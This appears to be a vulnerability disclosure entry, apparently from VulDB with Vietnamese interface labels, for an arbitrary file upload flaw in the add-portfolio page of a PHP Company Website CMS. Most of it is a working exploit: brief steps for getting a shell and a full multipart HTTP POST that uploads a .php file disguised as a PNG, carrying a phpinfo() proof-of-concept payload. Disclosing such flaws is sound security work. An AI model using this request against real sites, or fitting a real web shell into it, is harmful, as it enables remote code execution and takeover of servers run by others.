| tiêu đề | Company Website CMS Backstage management add-portfolio RCE |
|---|
| Mô tả | info:There is an arbitrary file upload vulnerability in the company's website CMS background management add-portfolio
Add a portfolio in the background, upload attachments, capture packages, and modify the attachment suffix to php as needed.
Modify the attached content php code getshell to achieve RCE.
Then traverse the URL:/dashboard/uploads/portfolio/xxxxx.php access
payload:
POST /dashboard/add-portfolio.php HTTP/1.1
Host: 192.168.153.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------181572735023140528043402355237
Content-Length: 769
Origin: http://192.168.153.1:8090
Connection: close
Referer: http://192.168.153.1:8090/dashboard/add-portfolio.php
Cookie: PHPSESSID=vomi3si61qo6kdmeg950fo9uk2
Upgrade-Insecure-Requests: 1
-----------------------------181572735023140528043402355237
Content-Disposition: form-data; name="port_title"
ssssssssssssssssssssssss
-----------------------------181572735023140528043402355237
Content-Disposition: form-data; name="port_desc"
ssssssssssssssssssssssss
-----------------------------181572735023140528043402355237
Content-Disposition: form-data; name="port_detail"
ssssssssssssssssssssssss
-----------------------------181572735023140528043402355237
Content-Disposition: form-data; name="ufile"; filename="123.php"
Content-Type: image/png
<?php phpinfo();?>
-----------------------------181572735023140528043402355237
Content-Disposition: form-data; name="save"
-----------------------------181572735023140528043402355237--
|
|---|
| Nguồn | ⚠️ www.sourcecodester.com/php/15517/company-website-cms-php.html |
|---|
| Người dùng | jsbae3449 (UID 30775) |
|---|
| Đệ trình | 09/08/2022 19:33 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 10/08/2022 08:18 (13 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 206024 [SourceCodester Company Website CMS add-portfolio.php ufile nâng cao đặc quyền] |
|---|
| điểm | 17 |
|---|